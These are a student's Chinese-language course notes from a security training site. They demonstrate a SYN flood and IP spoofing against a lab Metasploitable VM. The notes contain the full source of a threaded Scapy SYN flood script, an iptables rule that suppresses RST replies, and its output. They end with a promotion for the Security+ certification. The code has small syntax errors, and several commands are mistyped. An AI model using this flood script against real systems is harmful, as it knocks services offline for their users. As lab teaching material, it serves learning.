【安全牛学习笔记】Syn-Flood、IP地址欺骗

Syn-Flood                         

长伴随IP欺骗                      

    - 真正的攻击目标              

Scapy                             

    - i=IP()                      

    - i.dst=1.1.1.1               

    - i.display()                 

    - t=TCP()                     

    - srl(i/t,verbose=1,timeout=3)

    - sr1(IP(dst=1.1.1.1)/TCP())

msfadmin@metasploitable:~$ ifconfig

root@K:~# scapy()

INFO: Can't import python gnuglot wrapper . won't be able to plot.

WARNING: NO route found for IPV6 destination :: (no default route?)

welcome to Scapy (2.3.2)

>>> exit()

root@K:~# apt-get install python gnuplot

root@K:~# scapy

WARNING: NO route found for IPV6 destination :: (no default route?)

welcome to Scapy (2.3.2)

>>> i=iP

>>> i.display()

###[ IP ]###

  version= 4

  ihl= None

  tos= 0x0

  len= None

  id= 1

  flags= 

  frag= 0

  ttl= 64

  proto= tcp

  chksum= None

  src= 127.0.0.1

  dst= 127.0.0.1

  \options\

>>> i.dst="192.168.1.110"

>>> i.display()

###[ IP ]###

  version= 4

  ihl= None

  tos= 0x0

  len= None

  id= 1

  flags= 

  frag= 0

  ttl= 64

  proto= tcp

  chksum= None

  src= 192.168.1.109

  dst= 192.168.1.110

  \options\

>>> t=TCP()

>>> t.display()

###[ TCP ]###

     sport= ftp_data

     dport= http

     seq= 0

     ack= 0

     dataofs= None

     reserved= 0

     flags= S

     window= 8192

     chksum= None

     urgptr= 0

     options= {}

>>> t.dport=22

>>> t.display

###[ TCP ]###

     sport= ftp_data

     dport= ssh

     seq= 0

     ack= 0

     dataofs= None

     reserved= 0

     flags= S

     window= 8192

     chksum= None

     urgptr= 0

     options= {}

>>>srl(i/t,verbose=1,timeout=2)

Begin emission:

Finished to send 1 packets.

Received 2 packets, got 1 answers, remaining 0 packets

<IP version= 4L ihl=5L tos= 0x0 len=44 id= 1 flags=DF  frag=OL ttl= 64 proto= tcp chksum=0xb6a0 src= 192.168.1.110 dst= 192.168.1.109 options=[] |<TCP  sport= ssh dport=ftp_data seq=3703105205 ack= 1 dataofs= 6L reserved=OL flags=SA window=5840 chksum=0x397d urgptr= 0 options= {('MSS',1460)} |<Padding load='\x00\x00' |>>>

wireshark

ip.addr eq 192.168.1.110

Syn-Flood                                                           

攻击脚本：./syn_flood.py                                               

    - iptables -A OUTPUT -p tcp --tcp-flags RST -d 1.1.1.1 -j DROP      

    - netstat -n | awk '/^tcp/{++S[$NF]} END {for(a in S) print a,S[a]}'

    - windows系统默认半开连接数10个

 LISTENS服务器端口处于侦听状态，等待连接请求SYN-SENTC发起连接请求，等待对端响应SYN-RECVS已收到连接请求ESTABLISHED C/S三次握手成功，TCP连接已经建立FIN-WAIT-1 C/S等待对端响应中断请求确认，或对端终端请求FIN-WAIT-2 C/S等待对端发送中断请求 CLOSE-WAITC/S等待本地 进程/用户 关闭连接 CLOSINGC/S等待对端响应连接中断确认  LAST-ACK C/S等待对端响应之前的连接中断确认TIME-WAITC/S等待足够时间长度确保对端收到连接中断确认（最大4分钟） CLOSEDC/S无任何连接状态

root@K:~# iptables -A OUTPUT -p tcp --tcp-flags RST -d 192.168.1.110 -j DROP

root@K:~# iptable -L

Chain INPUT (policy ACCEPT)

target     port opt source              destination

Chain FPRWARD (policy ACCEPT)

target     port opt source              destination

Chain OUTPUT (policy ACCEPT)

target     port opt source              destination

DROP       tcp  -- anywhere             192.168.1.110        tcp flags:RST/RST

root@K:~# cp /media/sf_D_DRIVE/脚本/syn_flood.py .    //拷贝到当前目录

root@K:~# ls

Desptop    Downloads  Pictures  sys_flood.py  Videos

Documents  Music      public    Templates

root@K:~# geany syn_flood.py

------------------------------------------------------------

#!/usr/bin/python

# .*. coding: utf-8 -*

from scapy.all import *

from time import sleep

import thread

import random

import logging

logging.getLogger("scapy.runtime").setLevel(Logging.ERROR)

if len(sys.argv) != 4:

    print "用法:  ./syn_flood.py [IP地址] [端口] [线程数]"

    print "举例:  ./syn_flood.py 1.1.1.1 80 20"

    sys.exit()

target = str(sys.argv[1])

port = int(sys.argv[2])

threads = int(sys.argv[3])

print "正在执行 SYN flood 攻击，按 Ctrl+C 停止攻击."

def synflood(target,port):

    while 0 == 0

        x = random.randint(0,65535)

        send(IP(dst=target)/TCP(dport=port,sport=x),verbose=0)

for x in range(0,threads):

    thread.start_new_thread(synflood, (target,port))

while 0 == 0

    sleep(1) 

------------------------------------------------------------

root@K:~# ./syn_flood.py

WARNING: No route found for IPV6 destination :: (no default route?)

用法:  ./syn_flood.py [IP地址] [端口] [线程数]

举例:  ./syn_flood.py 1.1.1.1 80 20

root@K:~# ./syn_flood.py 192.168.1.110 22 200

root@K:~# ssh msfadmin@192.168.1.110

The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.

RSA key fingerprint is SHA256:BQHM5EoHx9GCi0LuVscegPXLQOsuPs+E9d/rrJB84rk.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.

msfadmin@192.168.1.110's password:

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individal files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY , to the exten permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

No mail,

last login: Thu Jun 16 07:25:55 2016

msfadmin@metasploitable:~$ exit

logout

Conection to 192.168.1.110 closed.

root@K:~# ssh msfadmin@192.168.1.110

msfadmin@metasploitable:~$ sudo netstat -n

msfadmin@metasploitable:~$ sudo netstat -n | awk '/^tcp/{++S[$NF]} END {for(a in S) print a,S[a]}'

SYN_RECV 254

C:\> net user yuanfh 123

root@K:~# openvas-stop

Stopping Openvas Services

root@K:~# rdestop 192.168.1.111

root@K:~# netstat -pantu | more

IP地址欺骗              

经常用于Dos攻击         

根据IP头地址寻址        

    - 伪造IP源地址      

边界路由器过滤          

    - 入站、出站        

受害者可能是源、目的地址

绕过基于地址的验证      

压力测试模拟多用户      

上层协议（TCP序列号）

该笔记为安全牛课堂学员笔记，想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证？

      牛妹先给大家介绍一下Security+

        Security+ 认证是一种中立第三方认证，其发证机构为美国计算机行业协会CompTIA ；是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一，和CISSP偏重信息安全管理相比，Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全，合规性和操作安全，威胁和漏洞，应用程序、数据和主机安全，访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易，含金量较高，目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因？  

       原因一：在所有信息安全认证当中，偏重信息安全技术的认证是空白的， Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP，但是无论CISP还是CISSP都是偏重信息安全管理的，技术知识讲的宽泛且浅显，考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上，CISP也要求大专学历4年以上工作经验，这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中，无论是找工作还是升职加薪，或是投标时候报人员，认证都是必不可少的，这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍，由于Security+偏重信息安全技术，所以对工作经验没有特别的要求。只要你有IT相关背景，追求进步就可以学习和考试。

       原因二： IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业，IT运维人员非常多，IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍，死亦写代码”的悲壮，但也有着“锄禾日当午，不如运维苦“的感慨。天天对着电脑和机器，时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识，掌握网络安全实践。职业发展朝着网络安全的方向发展，解决国内信息安全人才的匮乏问题。另外，即使不转型，要做好运维工作，学习安全知识取得安全认证也是必不可少的。

        原因三：接地气、国际范儿、考试方便、费用适中！

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下，人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的，相信Security+认证一定会成为最火爆的信息安全认证。